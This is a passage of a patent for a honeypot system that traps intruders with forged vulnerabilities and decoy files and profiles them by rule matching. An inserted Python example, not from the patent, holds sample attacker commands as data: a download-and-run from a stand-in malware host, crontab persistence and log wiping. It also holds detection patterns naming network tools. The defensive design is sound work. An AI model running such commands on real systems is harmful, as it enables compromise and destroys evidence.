step 102: utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
step 103: generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
step 104: generating false information in the virtual file system by using an information spoofing module;
step 105: when an attacker enters the simulated network service and performs attack behavior operation on the false information, the operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to trap the network intrusion behavior of the attacker by using the portrayal.
Further, step 101 includes:
simulating real network service by using a honeypot technology to obtain simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technologies.
Further, step 102 includes:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing the vulnerability rule base.
Further, step 103 includes:
and mirroring the real file system by using a docker technology to generate a file system in the simulated network service to obtain a virtual file system.
Further, step 104 includes:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
Further, step 105 includes:
step 1051: when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
step 1052: extracting characteristic elements in the attack behavior data;
step 1053: according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
Specifically, the characteristic elements include: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
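The profiling steps 1051 to 1053 above, as an added example that is not the patent's own code: it extracts the six kinds of characteristic elements named in the text (IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions and intrusion behavior) from constructed honeypot event records and builds an attacker portrait with a small forward-chaining rule matcher. The patent suggests the Rete algorithm for this step; a linear rule scan is used here for clarity, and every IP address, domain, hash, tool list, pattern and rule name is a constructed assumption.

```python
"""Attacker portrait from characteristic elements via rule matching (added example)."""
import re
from typing import Callable, Dict, List, Set, Tuple

# Constructed sample events, in the shape the operation control module might record them.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"src_ip": "203.0.113.7", "kind": "cmd", "data": "uname -a; id"},
    {"src_ip": "203.0.113.7", "kind": "cmd", "data": "wget http://dl.malware.example/x.sh -O /tmp/x.sh"},
    {"src_ip": "203.0.113.7", "kind": "upload", "data": "/tmp/x.sh",
     "sha256": "0000-constructed-sample-hash-0000"},
    {"src_ip": "203.0.113.7", "kind": "cmd", "data": "chmod +x /tmp/x.sh && /tmp/x.sh"},
    {"src_ip": "203.0.113.7", "kind": "cmd", "data": "(crontab -l; echo '* * * * * /tmp/x.sh') | crontab -"},
    {"src_ip": "203.0.113.7", "kind": "cmd", "data": "rm -f /var/log/auth.log; history -c"},
]

# Assumed tool vocabulary and behaviour patterns; a production system would load these from a rule base.
KNOWN_TOOLS: Set[str] = {"wget", "curl", "nmap", "nc", "ncat", "masscan", "sqlmap", "hydra"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
BEHAVIOUR_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("recon", re.compile(r"\b(uname|id|whoami|ifconfig|ip a|cat /etc/passwd)\b")),
    ("download", re.compile(r"\b(wget|curl)\b")),
    ("execute", re.compile(r"chmod \+x|(^|[;&| ])/tmp/\S+")),
    ("persistence", re.compile(r"\bcrontab\b|/etc/rc\.local|\.bashrc")),
    ("anti_forensics", re.compile(r"rm .*/var/log|history -c|unset HISTFILE")),
]


def extract_features(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Step 1052: pull the six characteristic element kinds out of raw attack behaviour data."""
    feats: Dict[str, object] = {"ips": set(), "domains": set(), "tools": set(),
                                "samples": set(), "instructions": [], "behaviours": set()}
    for ev in events:
        feats["ips"].add(ev["src_ip"])                                    # IP information
        if ev["kind"] == "upload":
            feats["samples"].add(ev["sha256"])                            # malicious file sample
            continue
        cmd = ev["data"]
        feats["instructions"].append(cmd)                                 # intrusion instruction
        feats["domains"].update(URL_RE.findall(cmd))                      # domain name information
        feats["tools"].update(t for t in KNOWN_TOOLS if re.search(rf"\b{t}\b", cmd))  # intrusion tools
        for label, pattern in BEHAVIOUR_PATTERNS:                         # intrusion behaviour
            if pattern.search(cmd):
                feats["behaviours"].add(label)
    return feats


# Step 1053: rules over the feature elements. Each rule yields one portrait tag when it fires.
RULES: List[Tuple[str, Callable[[Dict[str, object]], bool]]] = [
    ("dropper", lambda f: {"download", "execute"} <= f["behaviours"] and bool(f["samples"])),
    ("persistent_foothold", lambda f: "persistence" in f["behaviours"]),
    ("covers_tracks", lambda f: "anti_forensics" in f["behaviours"]),
    ("scanner_only", lambda f: f["behaviours"] <= {"recon"}),
    ("uses_public_tooling", lambda f: bool(f["tools"] & {"nmap", "masscan", "sqlmap", "hydra"})),
]


def match_rules(feats: Dict[str, object]) -> List[str]:
    """Linear forward-chaining scan (a Rete network would index the same conditions)."""
    return [name for name, condition in RULES if condition(feats)]


def build_portrait(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Steps 1051 to 1053 end to end: events -> feature elements -> tags -> portrait."""
    feats = extract_features(events)
    tags = match_rules(feats)
    if {"dropper", "persistent_foothold"} <= set(tags):
        level = "high"
    elif tags:
        level = "medium"
    else:
        level = "low"
    return {
        "ips": sorted(feats["ips"]), "domains": sorted(feats["domains"]),
        "tools": sorted(feats["tools"]), "samples": sorted(feats["samples"]),
        "behaviours": sorted(feats["behaviours"]),
        "instruction_count": len(feats["instructions"]),
        "tags": tags, "threat_level": level,
    }


if __name__ == "__main__":
    for key, value in build_portrait(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

The portrait is deliberately built only from elements the decoy observed, so each tag can be traced back to the instructions and samples that triggered it; this is what makes the profile usable for blocking and isolating the same actor on the real network rather than a guess about intent.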
According to the intrusion active trapping method based on the high-simulation virtual environment, the network service simulation module simulates a real network service to obtain a simulated network service, and the security vulnerability counterfeiting module forges a security vulnerability for the simulated network service so that an attacker enters the simulated network service through that vulnerability; this provides the simulation scene needed to trap the attacker and protects the user's real network environment. The file system mirror image module generates the file system in the simulated network service to obtain a virtual file system, and the information deception module generates false information in the virtual file system. When the attacker enters the simulated network service and performs attack operations on the false information, the operation control module collects the attacker's attack behavior data and portrays the attacker from it, and the portrait is used to trap the attacker's network intrusion behavior. The attacker can thus be actively trapped, and the attack on the real network environment is blocked and isolated. By interacting with attackers over a long period the system can also portray various types of attackers, so that various new advanced threats are dealt with, a safe and reliable network environment is provided for users, and the user experience is improved.
It is to be understood that the system embodiments provided above correspond to the method embodiments described above, and corresponding specific contents may be referred to each other, which are not described herein again.
Example three
The embodiment of the present invention further provides a readable storage medium, on which an executable program is stored, and when the executable program is executed by a processor, the steps in the intrusion active trapping method based on the highly-simulated virtual environment provided by the above embodiment are implemented.
It is understood that the same or similar parts in the above embodiments may be mutually referred to, and the same or similar parts in other embodiments may be referred to for the content which is not described in detail in some embodiments.
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
The above description is only for the specific embodiments of the present invention, but the scope of the present invention is not limited thereto, and any person skilled in the art can easily conceive of the changes or substitutions within the technical scope of the present invention, and all the changes or substitutions should be covered within the scope of the present invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the appended claims.

Claims (8)

1. An intrusion active trapping system based on a highly simulated virtual environment, the system comprising:
the network service simulation module is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module is used for generating a file system in the simulated network service to obtain a virtual file system;
the information deception module is used for generating false information in the virtual file system;
and the operation control module is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and carries out attack behavior operation on the false information, and portrays the attacker according to the attack behavior data so as to utilize the portrayal to trap the network intrusion behavior of the attacker.
2. The system of claim 1, wherein the network service simulation module is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain the simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technology.
3. The system of claim 1, wherein the security vulnerability counterfeiting module is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing a vulnerability rule base.
4. The system of claim 1, wherein the file system mirroring module is specifically configured to:
and mirroring the real file system by using a docker technology to generate the file system in the simulated network service to obtain a virtual file system.
5. The system of claim 1, wherein the information spoofing module is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
6. The system of claim 1, wherein the operation control module is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
and according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
7. The system of claim 6, wherein the feature element comprises: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
8. An intrusion active trapping method based on a high simulation virtual environment, which is applied to the intrusion active trapping system based on the high simulation virtual environment of any one of claims 1 to 7, wherein the method comprises the following steps:
simulating real network service by using a network service simulation module to obtain simulated network service;
utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
generating false information in the virtual file system by using an information spoofing module;
when an attacker enters the simulated network service and performs attack behavior operation on the false information, an operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to utilize the portrayal to trap network intrusion behaviors of the attacker.
CN202210776795.XA 2022-07-04 2022-07-04 Intrusion active trapping system and method based on high-simulation virtual environment Pending CN115242466A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210776795.XA CN115242466A (en) 2022-07-04 2022-07-04 Intrusion active trapping system and method based on high-simulation virtual environment

Publications (1)

Publication Number Publication Date
CN115242466A true CN115242466A (en) 2022-10-25

Family

ID=83671264

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210776795.XA Pending CN115242466A (en) 2022-07-04 2022-07-04 Intrusion active trapping system and method based on high-simulation virtual environment

Country Status (1)

Country Link
CN (1) CN115242466A (en)

Patent Citations (9)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20060059554A1 (en) * 2004-09-13 2006-03-16 Ofer Akerman System and method for information technology intrusion prevention
CN108156163A (en) * 2017-12-28 2018-06-12 广州锦行网络科技有限公司 Multidimensional deception bait based on Honeypot Techniques realizes system and method
CN110674288A (en) * 2018-06-12 2020-01-10 蓝盾信息安全技术有限公司 User portrait method applied to network security field
CN110784476A (en) * 2019-10-31 2020-02-11 国网河南省电力公司电力科学研究院 Power monitoring active defense method and system based on virtualization dynamic deployment
CN111652658A (en) * 2020-06-11 2020-09-11 北京妙医佳健康科技集团有限公司 Portrait fusion method, apparatus, electronic device and computer readable storage medium
US20210409446A1 (en) * 2020-06-24 2021-12-30 Fortinet, Inc. Leveraging network security scanning to obtain enhanced information regarding an attack chain involving a decoy file
CN113014598A (en) * 2021-03-20 2021-06-22 北京长亭未来科技有限公司 Protection method for robot malicious attack, firewall, electronic device and storage medium
CN113676472A (en) * 2021-08-18 2021-11-19 国网湖南省电力有限公司 Extensible honeypot source tracing reverse control method in power industry
CN113992435A (en) * 2021-12-27 2022-01-28 北京微步在线科技有限公司 Attack detection tracing method, device and system

Non-Patent Citations (7)

* Cited by examiner, † Cited by third party
Title
BONELEE: "Threat-intelligence-based attack group profiling and attribution", Retrieved from the Internet <URL:https://www.cnblogs.com/bonelee/p/13347187.html> *
姚兰; 王新梅: "Research on deception-based network active defense technology", Journal of National University of Defense Technology, no. 03, pages 66-68 *
姚兰; 钟力: "Design and implementation of a network active defense system based on a deep deception strategy", High Technology Letters, no. 08, pages 798-801 *
字节脉搏实验室: "Analysis of attacker profile content", Retrieved from the Internet <URL:https://cloud.tencent.com/developer/article/1762685> *
曾子明: "Information Recommendation Systems", 30 June 2020, Wuhan University Press, page 8 *
王祖俪: "Research on key technologies of attacker profiling in network security", Information Technology and Informatization, 25 August 2018 (2018-08-25), pages 143-145 *
田盛丰, 黄厚宽: "Artificial Intelligence and Knowledge Engineering", 31 August 1999, China Railway Publishing House, page 3 *

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115632882A (en) * 2022-12-15 2023-01-20 北京市大数据中心 Illegal network attack detection method, computer device and medium
CN115632882B (en) * 2022-12-15 2023-05-23 北京市大数据中心 Illegal network attack detection method, computer equipment and medium
CN115659343A (en) * 2022-12-27 2023-01-31 北京知其安科技有限公司 Container attack simulation method and detection method for simulating real attack, and terminal

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination